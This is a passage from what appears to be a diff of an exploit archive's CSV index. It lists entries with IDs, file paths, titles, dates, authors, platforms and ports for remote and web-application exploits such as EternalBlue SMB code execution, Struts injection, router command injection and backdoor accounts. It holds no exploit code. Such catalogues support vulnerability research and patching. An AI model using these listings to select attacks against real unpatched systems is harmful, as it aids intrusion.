Remote Buffer Overflow",2017-02-28,"Peter Baris",remote,windows, +41480,exploits/hardware/remote/41480.txt,"WePresent WiPG-1500 - Backdoor Account",2017-02-27,"Quentin Olagne",remote,hardware, +41511,exploits/windows/remote/41511.py,"FTPShell Client 6.53 - Remote Buffer Overflow",2017-03-04,"Peter Baris",remote,windows, +41545,exploits/windows/remote/41545.py,"Azure Data Expert Ultimate 2.2.16 - Remote Buffer Overflow",2017-03-07,"Peter Baris",remote,windows, +41592,exploits/windows/remote/41592.txt,"MobaXterm Personal Edition 9.4 - Directory Traversal",2017-03-11,hyp3rlinx,remote,windows, +41598,exploits/cgi/remote/41598.rb,"NETGEAR R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit)",2017-03-13,Metasploit,remote,cgi,80 +41613,exploits/windows/remote/41613.rb,"IBM WebSphere - RCE Java Deserialization (Metasploit)",2017-03-15,Metasploit,remote,windows,8800 +41614,exploits/multiple/remote/41614.rb,"Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit)",2017-03-15,Metasploit,remote,multiple,8080 +41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows, +41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows, +41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows, +41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22 +41680,exploits/linux/remote/41680.rb,"ExaGrid - Known SSH Key and Default Password (Metasploit)",2016-04-07,Metasploit,remote,linux,22 +41684,exploits/multiple/remote/41684.rb,"GIT 1.8.5.6/1.9.5/2.0.5/2.1.4/2.2.1 & Mercurial < 3.2.3 - Multiple Vulnerabilities (Metasploit)",2014-12-18,Metasploit,remote,multiple, +41689,exploits/multiple/remote/41689.rb,"Ruby on Rails 4.0.x/4.1.x/4.2.x (Web Console v2) - Whitelist Bypass Code Execution (Metasploit)",2015-06-16,Metasploit,remote,multiple, +41690,exploits/multiple/remote/41690.rb,"Apache Struts < 1.3.10 / < 2.3.16.2 - ClassLoader Manipulation Remote Code Execution (Metasploit)",2014-03-06,Metasploit,remote,multiple, +41694,exploits/multiple/remote/41694.rb,"SSH - User Code Execution (Metasploit)",1999-01-01,Metasploit,remote,multiple, +41695,exploits/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,remote,linux, +41795,exploits/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",remote,linux, +42261,exploits/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET 'PassWD' Remote Buffer Overflow (SEH)",2017-06-27,clubjk,remote,windows,80 +42885,exploits/multiple/remote/42885.rb,"LAquis SCADA 4.1.0.2385 - Directory Traversal (Metasploit)",2017-09-27,"James Fitts",remote,multiple, +42256,exploits/windows/remote/42256.rb,"Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit)",2017-06-17,Metasploit,remote,windows,80 +42756,exploits/java/remote/42756.py,"HPE < 7.2 - Java Deserialization",2017-09-19,"Raphael Kuhn",remote,java, +42587,exploits/hardware/remote/42587.rb,"QNAP Transcode Server - Command Execution (Metasploit)",2017-08-29,Metasploit,remote,hardware,9251 +42316,exploits/windows/remote/42316.ps1,"Skype for Business 2016 - Cross-Site Scripting",2017-07-12,nyxgeek,remote,windows, +42779,exploits/linux/remote/42779.rb,"Supervisor 3.0a1 < 3.3.2 - XML-RPC Authenticated Remote Code Execution (Metasploit)",2017-09-25,Metasploit,remote,linux,9001 +41987,exploits/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",remote,windows, +42287,exploits/android/remote/42287.txt,"eVestigator Forensic PenTester - MITM Remote Code Execution",2017-06-30,intern0t,remote,android, +41718,exploits/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",remote,hardware, +41719,exploits/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - Unauthenticated 'hidden_lang_avi' Remote Stack Overflow (Metasploit)",2017-03-24,Metasploit,remote,hardware,80 +41720,exploits/python/remote/41720.rb,"Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",remote,python, +41738,exploits/windows/remote/41738.py,"Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow",2017-03-27,"Zhiniang Peng & Chen Wu",remote,windows, +41740,exploits/multiple/remote/41740.txt,"Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory",2017-03-27,"Google Security Research",remote,multiple, +41744,exploits/linux/remote/41744.rb,"Github Enterprise - Default Session Secret and Deserialization (Metasploit)",2017-03-27,Metasploit,remote,linux,8443 +41751,exploits/windows/remote/41751.txt,"DzSoft PHP Editor 4.2.7 - File Enumeration",2017-03-28,hyp3rlinx,remote,windows, +41775,exploits/windows/remote/41775.py,"Sync Breeze Enterprise 9.5.16 - 'GET' Remote Buffer Overflow (SEH)",2017-03-29,"Daniel Teixeira",remote,windows, +41808,exploits/hardware/remote/41808.txt,"Broadcom Wi-Fi SoC - 'dhd_handle_swc_evt' Heap Overflow",2017-04-04,"Google Security Research",remote,hardware, +41825,exploits/windows/remote/41825.txt,"SpiceWorks 7.5 TFTP - Remote File Overwrite / Upload",2017-04-05,hyp3rlinx,remote,windows, +41850,exploits/windows/remote/41850.txt,"Moxa MXview 2.8 - Private Key Disclosure",2017-04-10,hyp3rlinx,remote,windows, +41852,exploits/windows/remote/41852.txt,"Moxa MX AOPC-Server 1.5 - XML External Entity Injection",2017-04-10,hyp3rlinx,remote,windows, +41861,exploits/linux/remote/41861.py,"Quest Privilege Manager 6.0.0 - Arbitrary File Write",2017-04-10,m0t,remote,linux, +41872,exploits/hardware/remote/41872.py,"Cisco Catalyst 2960 IOS 12.2(55)SE11 - 'ROCEM' Remote Code Execution",2017-04-12,"Artem Kondratenko",remote,hardware,23 +42122,exploits/hardware/remote/42122.py,"Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution",2017-04-12,"Artem Kondratenko",remote,hardware,23 +41892,exploits/linux/remote/41892.sh,"Tenable Appliance < 4.5 - Unauthenticated Root Remote Code Execution",2017-04-18,agix,remote,linux,8000 +41894,exploits/windows/remote/41894.py,"Microsoft Word - '.RTF' Remote Code Execution",2017-04-18,"Bhadresh Patel",remote,windows, +41895,exploits/hardware/remote/41895.rb,"Huawei HG532n - Command Injection (Metasploit)",2017-04-19,Metasploit,remote,hardware, +41903,exploits/windows/remote/41903.txt,"Microsoft Windows - ManagementObject Arbitrary .NET Serialization Remote Code Execution",2017-04-20,"Google Security Research",remote,windows, +41910,exploits/linux/remote/41910.sh,"SquirrelMail < 1.4.22 - Remote Code Execution",2017-04-23,"Dawid Golunski",remote,linux, +41929,exploits/windows/remote/41929.py,"Microsoft Windows 2003 SP2 - 'ERRATICGOPHER' SMB Remote Code Execution",2017-04-25,vportal,remote,windows, +41934,exploits/windows/remote/41934.rb,"Microsoft Office Word - '.RTF' Malicious HTA Execution (Metasploit)",2017-04-25,Metasploit,remote,windows, +41935,exploits/hardware/remote/41935.rb,"WePresent WiPG-1000 - Command Injection (Metasploit)",2017-04-25,Metasploit,remote,hardware,80 +41942,exploits/python/remote/41942.rb,"Mercurial - Custom hg-ssh Wrapper Remote Code Exec (Metasploit)",2017-04-27,Metasploit,remote,python,22 +41964,exploits/macos/remote/41964.html,"Apple Safari 10.0.3 - 'JSC::CachedCall' Use-After-Free",2017-05-04,"saelo & niklasb",remote,macos, +41975,exploits/windows/remote/41975.txt,"Microsoft Security Essentials / SCEP (Microsoft Windows 8/8.1/10 / Windows Server) - 'MsMpEng' Remote Type Confusion",2017-05-09,"Google Security Research",remote,windows, +41978,exploits/multiple/remote/41978.py,"Oracle GoldenGate 12.1.2.0.0 - Unauthenticated Remote Code Execution",2017-05-09,"Silent Signal",remote,multiple, +41980,exploits/python/remote/41980.rb,"Crypttech CryptoLog - Remote Code Execution (Metasploit)",2017-05-09,"Mehmet Ince",remote,python,80 +41992,exploits/windows/remote/41992.rb,"Microsoft IIS - WebDav 'ScStoragePathFromUrl' Remote Overflow (Metasploit)",2017-05-11,Metasploit,remote,windows, +41996,exploits/php/remote/41996.sh,"Vanilla Forums < 2.3 - Remote Code Execution",2017-05-11,"Dawid Golunski",remote,php, +42010,exploits/linux/remote/42010.rb,"Quest Privilege Manager - pmmasterd Buffer Overflow (Metasploit)",2017-05-15,Metasploit,remote,linux, +42011,exploits/windows/remote/42011.py,"LabF nfsAxe 3.7 FTP Client - Remote Buffer Overflow (SEH)",2017-05-15,Tulpa,remote,windows, +42030,exploits/win_x86-64/remote/42030.py,"Microsoft Windows Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,remote,win_x86-64,445 +42022,exploits/windows/remote/42022.rb,"Dup Scout Enterprise 9.5.14 - GET Buffer Overflow (Metasploit)",2017-05-17,Metasploit,remote,windows, +42023,exploits/windows/remote/42023.rb,"Serviio Media Server - checkStreamUrl Command Execution (Metasploit)",2017-05-17,Metasploit,remote,windows,23423 +42024,exploits/php/remote/42024.rb,"WordPress PHPMailer 4.6 - Host Header Command Injection (Metasploit)",2017-05-17,Metasploit,remote,php, +42025,exploits/php/remote/42025.rb,"BuilderEngine 3.5.0 - Arbitrary File Upload and Execution (Metasploit)",2017-05-17,Metasploit,remote,php,80 +42026,exploits/xml/remote/42026.py,"Oracle PeopleSoft - XML External Entity to SYSTEM Remote Code Execution",2017-05-17,"Ambionics Security",remote,xml, +42031,exploits/win_x86-64/remote/42031.py,"Microsoft Windows Windows 7/2008 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,remote,win_x86-64,445 +42083,exploits/windows/remote/42083.rb,"Octopus Deploy - Authenticated Code Execution (Metasploit)",2017-05-29,Metasploit,remote,windows, +42084,exploits/linux/remote/42084.rb,"Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit)",2017-05-29,Metasploit,remote,linux, +42041,exploits/windows/remote/42041.txt,"Secure Auditor 3.0 - Directory Traversal",2017-05-20,hyp3rlinx,remote,windows, +42057,exploits/windows/remote/42057.rb,"VX Search Enterprise 9.5.12 - GET Buffer Overflow (Metasploit)",2017-05-23,Metasploit,remote,windows, +42060,exploits/linux/remote/42060.py,"Samba 3.5.0 - Remote Code Execution",2017-05-24,steelo,remote,linux, +42078,exploits/linux/remote/42078.js,"Google Chrome 60.0.3080.5 V8 JavaScript Engine - Out-of-Bounds Write",2017-05-26,halbecaf,remote,linux, +42079,exploits/hardware/remote/42079.txt,"CERIO DT-100G-N/DT-300N/CW-300N - Multiple Vulnerabilities",2017-05-28,LiquidWorm,remote,hardware, +42125,exploits/macos/remote/42125.txt,"Apple Safari 10.1 - Spread Operator Integer Overflow Remote Code Execution",2017-06-06,saelo,remote,macos, +42128,exploits/windows/remote/42128.txt,"Home Web Server 1.9.1 (build 164) - Remote Code Execution",2017-05-26,"Guillaume Kaddouch",remote,windows, +42134,exploits/python/remote/42134.rb,"DC/OS Marathon UI - Docker (Metasploit)",2017-06-07,Metasploit,remote,python, +42152,exploits/multiple/remote/42152.py,"VMware vSphere Data Protection 5.x/6.x - Java Deserialization",2017-06-10,"Kelly Correll",remote,multiple, +42155,exploits/windows/remote/42155.py,"EFS Easy Chat Server 3.1 - Remote Buffer Overflow (SEH)",2017-06-09,"Aitezaz Mohsin",remote,windows, +42158,exploits/linux/remote/42158.py,"Logpoint < 5.6.4 - Unauthenticated Root Remote Code Execution",2017-06-11,agix,remote,linux, +42159,exploits/windows/remote/42159.txt,"Easy File Sharing Web Server 7.2 - Authentication Bypass",2017-06-11,"Touhid M.Shaikh",remote,windows, +42165,exploits/windows/remote/42165.py,"Easy File Sharing Web Server 7.2 - 'POST' Remote Buffer Overflow",2017-06-12,"Touhid M.Shaikh",remote,windows, +42175,exploits/android/remote/42175.html,"Google Chrome - V8 Private Property Arbitrary Code Execution",2017-06-14,Qihoo360,remote,android, +42176,exploits/hardware/remote/42176.py,"HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution",2017-06-14,"Jacob Baines",remote,hardware,9100 +42186,exploits/windows/remote/42186.py,"Easy File Sharing Web Server 7.2 - 'POST' Remote Buffer Overflow (DEP Bypass)",2017-06-15,"bl4ck h4ck3r",remote,windows, +42222,exploits/windows/remote/42222.py,"SpyCamLizard 1.230 - Remote Buffer Overflow",2017-06-20,abatchy17,remote,windows, +42251,exploits/python/remote/42251.rb,"Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)",2017-06-26,"Mehmet Ince",remote,python,443 +42257,exploits/cgi/remote/42257.rb,"NETGEAR DGN2200 - 'dnslookup.cgi' Command Injection (Metasploit)",2017-06-26,Metasploit,remote,cgi,80 +42282,exploits/windows/remote/42282.rb,"Veritas/Symantec Backup Exec - SSL NDMP Connection Use-After-Free (Metasploit)",2017-06-29,Metasploit,remote,windows,10000 +42283,exploits/java/remote/42283.rb,"ActiveMQ < 5.14.0 - Web Shell Upload (Metasploit)",2017-06-29,Metasploit,remote,java, +42288,exploits/android/remote/42288.txt,"BestSafe Browser - MITM Remote Code Execution",2017-06-30,intern0t,remote,android, +42289,exploits/android/remote/42289.txt,"Australian Education App - Remote Code Execution",2017-06-30,intern0t,remote,android, +42296,exploits/unix/remote/42296.rb,"GoAutoDial 3.3 - Authentication Bypass / Command Injection (Metasploit)",2017-07-05,Metasploit,remote,unix,443 +42297,exploits/php/remote/42297.py,"Lepide Auditor Suite - 'createdb()' Web Console Database Injection / Remote Code Execution",2017-07-05,mr_me,remote,php,7778 +42303,exploits/multiple/remote/42303.txt,"Yaws 1.91 - Remote File Disclosure",2017-07-07,hyp3rlinx,remote,multiple, +42304,exploits/windows/remote/42304.py,"Easy File Sharing Web Server 7.2 - GET 'PassWD' Remote Buffer Overflow (DEP Bypass)",2017-07-08,"Sungchul Park",remote,windows, +42315,exploits/windows/remote/42315.py,"Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-07-11,sleepya,remote,windows, +42327,exploits/windows/remote/42327.html,"Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution",2017-07-14,Rh0,remote,windows, +42328,exploits/windows/remote/42328.py,"FTPGetter 5.89.0.85 - Remote Buffer Overflow (SEH)",2017-07-14,"Paul Purcell",remote,windows, +42331,exploits/hardware/remote/42331.txt,"Belkin F7D7601 NetCam - Multiple Vulnerabilities",2017-07-17,Wadeek,remote,hardware, +42394,exploits/java/remote/42394.py,"Jenkins < 1.650 - Java Deserialization",2017-07-30,"Janusz Piechówka",remote,java, +42349,exploits/android/remote/42349.txt,"SKILLS.com.au Industry App - MITM Remote Code Execution",2017-07-20,intern0t,remote,android, +42350,exploits/android/remote/42350.txt,"Virtual Postage (VPA) - MITM Remote Code Execution",2017-07-20,intern0t,remote,android, +42354,exploits/win_x86-64/remote/42354.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)",2017-07-24,redr2e,remote,win_x86-64, +42355,exploits/hardware/remote/42355.c,"CenturyLink ZyXEL PK5001Z Router - Root Remote Code Execution",2017-07-24,oxagast,remote,hardware, +42369,exploits/cgi/remote/42369.rb,"IPFire < 2.19 Update Core 110 - Remote Code Execution (Metasploit)",2017-07-24,Metasploit,remote,cgi, +42370,exploits/unix/remote/42370.rb,"VICIdial 2.9 RC 1 < 2.13 RC1 - 'user_authorization' Unauthenticated Command Execution (Metasploit)",2017-07-24,Metasploit,remote,unix, +42395,exploits/windows/remote/42395.py,"DiskBoss Enterprise 8.2.14 - Remote Buffer Overflow",2017-07-30,"Ahmad Mahfouz",remote,windows, +42484,exploits/windows/remote/42484.html,"Mozilla Firefox < 45.0 - 'nsHtml5TreeBuilder' Use-After-Free (EMET 5.52 Bypass)",2017-08-18,"Hans Jerry Illikainen",remote,windows, +42541,exploits/php/remote/42541.rb,"IBM OpenAdmin Tool - SOAP welcomeServer PHP Code Execution (Metasploit)",2017-08-22,Metasploit,remote,php, +42557,exploits/windows/remote/42557.py,"Dup Scout Enterprise 9.9.14 - Remote Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",remote,windows, +42558,exploits/windows/remote/42558.py,"Disk Savvy Enterprise 9.9.14 - Remote Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",remote,windows, +42559,exploits/windows/remote/42559.py,"Sync Breeze Enterprise 9.9.16 - Remote Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",remote,windows, +42560,exploits/windows/remote/42560.py,"Disk Pulse Enterprise 9.9.16 - Remote Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",remote,windows, +42599,exploits/python/remote/42599.rb,"Git < 2.7.5 - Command Injection (Metasploit)",2017-08-31,Metasploit,remote,python, +42614,exploits/windows/remote/42614.txt,"Mongoose Web Server 6.5 - Cross-Site Request Forgery / Remote Code Execution",2017-09-04,hyp3rlinx,remote,windows, +42627,exploits/linux/remote/42627.py,"Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution",2017-09-06,Warflop,remote,linux, +42630,exploits/windows/remote/42630.rb,"Gh0st Client (C2 Server) - Remote Buffer Overflow (Metasploit)",2017-09-07,Metasploit,remote,windows,80 +42650,exploits/python/remote/42650.rb,"Docker Daemon - Unprotected TCP Socket (Metasploit)",2017-09-11,Metasploit,remote,python,2375 +42683,exploits/windows/remote/42683.txt,"Mako Web Server 2.5 - Multiple Vulnerabilities",2017-09-13,hyp3rlinx,remote,windows, +42691,exploits/windows/remote/42691.rb,"ZScada Modbus Buffer 2.0 - Stack-Based Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",remote,windows, +42692,exploits/php/remote/42692.rb,"Trend Micro Control Manager - ImportFile Directory Traversal Remote Code Execution (Metasploit)",2017-09-13,"James Fitts",remote,php, +42693,exploits/windows/remote/42693.rb,"Viap Automation WinPLC7 5.0.45.5921 - Recv Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",remote,windows, +42694,exploits/windows/remote/42694.rb,"Sielco Sistemi Winlog 2.07.16 - Remote Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",remote,windows,46824 +42695,exploits/linux/remote/42695.rb,"Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit)",2014-06-13,"James Fitts",remote,linux, +42696,exploits/windows/remote/42696.rb,"Motorola Netopia Netoctopus SDCS - Remote Stack Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",remote,windows,3814 +42697,exploits/linux/remote/42697.rb,"Alienvault Open Source SIEM (OSSIM) < 4.7.0 - 'get_license' Remote Command Execution (Metasploit)",2014-08-14,"James Fitts",remote,linux, +42698,exploits/jsp/remote/42698.rb,"Infinite Automation Mango Automation - Command Injection (Metasploit)",2017-09-13,"James Fitts",remote,jsp, +42700,exploits/windows/remote/42700.rb,"Fatek Automation PLC WinProladder 3.11 Build 14701 - Stack-Based Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",remote,windows, +42701,exploits/java/remote/42701.rb,"EMC CMCNE Inmservlets.war FileUploadController 11.2.1 - Remote Code Execution (Metasploit)",2017-09-13,"James Fitts",remote,java, +42702,exploits/java/remote/42702.rb,"EMC CMCNE 11.2.1 - FileUploadController Remote Code Execution (Metasploit)",2017-09-13,"James Fitts",remote,java, +42703,exploits/windows/remote/42703.rb,"Dameware Mini Remote Control 4.0 - Username Stack Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",remote,windows, +42704,exploits/windows/remote/42704.rb,"Cloudview NMS < 2.00b - Arbitrary File Upload (Metasploit)",2017-09-13,"James Fitts",remote,windows, +42708,exploits/linux/remote/42708.rb,"Alienvault OSSIM av-centerd Util.pm sync_rserver - Command Execution (Metasploit)",2017-09-13,"James Fitts",remote,linux,40007 +42709,exploits/linux/remote/42709.rb,"Alienvault OSSIM av-centerd 4.7.0 - 'get_log_line' Command Injection (Metasploit)",2017-09-13,"James Fitts",remote,linux,40007 +42711,exploits/windows/remote/42711.txt,"Microsoft Windows .NET Framework - Remote Code Execution",2017-09-13,Voulnet,remote,windows, +42719,exploits/windows/remote/42719.rb,"EMC AlphaStor Library Manager < 4.0 build 910 - Opcode 0x4f Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",remote,windows,3500 +42720,exploits/windows/remote/42720.rb,"EMC AlphaStor Device Manager - Opcode 0x72 Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",remote,windows,3000 +42721,exploits/windows/remote/42721.rb,"Lockstep Backup for Workgroups 4.0.3 - Remote Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",remote,windows,2125 +42722,exploits/windows/remote/42722.rb,"Disk Pulse Server 2.2.34 - 'GetServerInfo' Remote Buffer Overflow (Metasploit)",2010-10-19,"James Fitts",remote,windows, +42723,exploits/windows/remote/42723.rb,"haneWIN DNS Server 1.5.3 - Remote Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",remote,windows,53 +42724,exploits/windows/remote/42724.rb,"KingScada AlarmServer 3.1.2.13 - Remote Stack Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",remote,windows,12401 +42725,exploits/windows/remote/42725.rb,"Cloudview NMS 2.00b - Writable Directory Traversal Execution (Metasploit)",2017-09-14,"James Fitts",remote,windows,69 +42726,exploits/hardware/remote/42726.py,"Astaro Security Gateway 7 - Remote Code Execution",2017-09-13,"Jakub Palaczynski",remote,hardware, +42753,exploits/multiple/remote/42753.txt,"Tecnovision DLX Spot - SSH Backdoor Access",2017-05-19,"Simon Brannstrom",remote,multiple, +42778,exploits/windows/remote/42778.py,"Disk Pulse Enterprise 10.0.12 - GET Buffer Overflow (SEH)",2017-09-25,sickness,remote,windows,80 +42767,exploits/windows/remote/42767.rb,"Disk Pulse Enterprise 9.9.16 - GET Buffer Overflow (Metasploit)",2017-09-21,Metasploit,remote,windows,80 +42780,exploits/windows/remote/42780.py,"Oracle 9i XDB 9.2.0.1 - HTTP PASS Buffer Overflow",2017-09-25,"Charles Dardaman",remote,windows, +42784,exploits/ios/remote/42784.txt,"Apple iOS 10.2 - Broadcom Out-of-Bounds Write when Handling 802.11k Neighbor Report Response",2017-09-25,"Google Security Research",remote,ios, +42787,exploits/hardware/remote/42787.txt,"FLIR Thermal Camera F/FC/PT/D - SSH Backdoor Access",2017-09-25,LiquidWorm,remote,hardware, +42790,exploits/linux/remote/42790.txt,"Tiny HTTPd 0.1.0 - Directory Traversal",2017-09-26,"Touhid M.Shaikh",remote,linux, +42793,exploits/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,remote,multiple,5858 +42806,exploits/java/remote/42806.py,"Oracle WebLogic Server 10.3.6.0 - Java Deserialization",2017-09-27,SlidingWindow,remote,java, +42888,exploits/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",remote,hardware, +42891,exploits/windows/remote/42891.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - MITM Remote Code Execution",2017-09-28,hyp3rlinx,remote,windows, +42928,exploits/windows/remote/42928.py,"Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow",2017-09-30,"Owais Mehtab",remote,windows, +42957,exploits/linux/remote/42957.py,"Unitrends UEB 9.1 - 'Unitrends bpserverd' Remote Command Execution",2017-08-08,"Jared Arave",remote,linux, +42938,exploits/linux/remote/42938.rb,"Qmail SMTP - Bash Environment Variable Injection (Metasploit)",2017-10-02,Metasploit,remote,linux, +42949,exploits/linux/remote/42949.txt,"UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Unauthenticated Root Remote Code Execution",2017-10-02,agix,remote,linux, +42952,exploits/windows/remote/42952.py,"ERS Data System 1.8.1 - Java Deserialization",2017-09-21,"West Shepherd",remote,windows, +42958,exploits/linux/remote/42958.py,"Unitrends UEB 9.1 - Authentication Bypass / Remote Command Execution",2017-08-08,"Jared Arave",remote,linux, +42964,exploits/lin_x86-64/remote/42964.rb,"Rancher Server - Docker Daemon Code Execution (Metasploit)",2017-10-09,Metasploit,remote,lin_x86-64,8080 +42965,exploits/multiple/remote/42965.rb,"OrientDB 2.2.2 < 2.2.22 - Remote Code Execution (Metasploit)",2017-10-09,Metasploit,remote,multiple,2480 +42973,exploits/windows/remote/42973.py,"VX Search Enterprise 10.1.12 - Remote Buffer Overflow",2017-10-09,"Revnic Vasile",remote,windows, +42984,exploits/windows/remote/42984.rb,"Sync Breeze Enterprise 10.1.16 - Remote Buffer Overflow (SEH) (Metasploit)",2017-10-13,wetw0rk,remote,windows, +42996,exploits/ios/remote/42996.txt,"Apple iOS 10.2 (14C92) - Remote Code Execution",2017-10-17,"Google Security Research",remote,ios, +43008,exploits/java/remote/43008.rb,"Tomcat - Remote Code Execution via JSP Upload Bypass (Metasploit)",2017-10-17,Metasploit,remote,java, +43025,exploits/windows/remote/43025.py,"Ayukov NFTP FTP Client < 2.0 - Remote Buffer Overflow",2017-10-21,"Berk Cem Göksel",remote,windows, +43030,exploits/lin_x86/remote/43030.rb,"Unitrends UEB 9 - http api/storage Remote Root (Metasploit)",2017-10-23,Metasploit,remote,lin_x86,443 +43031,exploits/lin_x86/remote/43031.rb,"Unitrends UEB 9 - bpserverd Authentication Bypass Remote Command Execution (Metasploit)",2017-10-23,Metasploit,remote,lin_x86,1743 +43032,exploits/unix/remote/43032.rb,"Polycom - Command Shell Authorization Bypass (Metasploit)",2017-10-23,Metasploit,remote,unix, +43055,exploits/hardware/remote/43055.rb,"Netgear DGN1000 1.1.00.48 - 'Setup.cgi' Unauthenticated Remote Code Execution (Metasploit)",2017-10-25,Metasploit,remote,hardware, +43059,exploits/windows/remote/43059.py,"DameWare Remote Controller < 12.0.0.520 - Remote Code Execution",2016-04-03,Securifera,remote,windows, +43061,exploits/hardware/remote/43061.txt,"MitraStar DSL-100HN-T1/GPT-2541GNAC - Privilege Escalation",2017-10-28,j0lama,remote,hardware, +43105,exploits/hardware/remote/43105.txt,"ZyXEL PK5001Z Modem - Backdoor Account",2017-10-31,"Matthew Sheimo",remote,hardware, +43112,exploits/unix/remote/43112.rb,"tnftp - 'savefile' Arbitrary Command Execution (Metasploit)",2017-11-03,Metasploit,remote,unix, +43118,exploits/hardware/remote/43118.txt,"Actiontec C1000A Modem - Backdoor Account",2017-11-04,"Joseph McDonagh",remote,hardware, +43121,exploits/windows/remote/43121.txt,"Avaya IP Office (IPO) < 10.1 - 'SoftConsole' Remote Buffer Overflow (SEH)",2017-11-05,hyp3rlinx,remote,windows, +43125,exploits/win_x86/remote/43125.html,"Microsoft Internet Explorer 11 (Windows 7 x86) - 'mshtml.dll' Remote Code Execution (MS17-007)",2017-10-17,mschenk,remote,win_x86, +43132,exploits/windows/remote/43132.rb,"Mako Server 2.5 - OS Command Injection Remote Command Execution (Metasploit)",2017-11-09,Metasploit,remote,windows, +43142,exploits/hardware/remote/43142.c,"Wireless IP Camera (P2P) WIFICAM - Unauthenticated Remote Code Execution",2017-03-08,PierreKimSec,remote,hardware,80 +43141,exploits/windows/remote/43141.py,"Ulterius Server < 1.9.5.0 - Directory Traversal",2017-11-13,"Rick Osgood",remote,windows, +43143,exploits/linux_mips/remote/43143.rb,"D-Link DIR-850L - Unauthenticated OS Command Execution (Metasploit)",2017-11-14,Metasploit,remote,linux_mips, +43145,exploits/windows/remote/43145.py,"Dup Scout Enterprise 10.0.18 - 'Login' Remote Buffer Overflow",2017-11-14,sickness,remote,windows,80 +42886,exploits/windows/remote/42886.py,"Sync Breeze Enterprise 10.1.16 - 'POST' Remote Buffer Overflow",2017-10-20,mschenk,remote,windows, +43163,exploits/windows/remote/43163.txt,"Microsoft Office - OLE Remote Code Execution",2017-11-20,embedi,remote,windows, +6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, +44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, +47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, +53,exploits/cgi/webapps/53.c,"CCBILL CGI - 'ccbillx.c' 'whereami.cgi' Remote Code Execution",2003-07-10,knight420,webapps,cgi, +38772,exploits/hardware/webapps/38772.txt,"ZTE ADSL ZXV10 W300 Modems - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",webapps,hardware,80 +137,exploits/php/webapps/137.pl,"phpBB 2.0.6 - 'search_id' SQL Injection / MD5 Hash",2003-12-21,RusH,webapps,php, +138,exploits/php/webapps/138.pl,"PHP-Nuke 6.9 - 'cid' SQL Injection",2003-12-21,RusH,webapps,php, +177,exploits/cgi/webapps/177.pl,"Poll It CGI 2.0 - Multiple Vulnerabilities",2000-11-15,keelis,webapps,cgi, +179,exploits/cgi/webapps/179.c,"News Update 1.1 - Change Admin Password",2000-11-15,morpheus[bd],webapps,cgi, +187,exploits/cgi/webapps/187.pl,"ListMail 112 - Command Execution",2000-11-17,teleh0r,webapps,cgi, 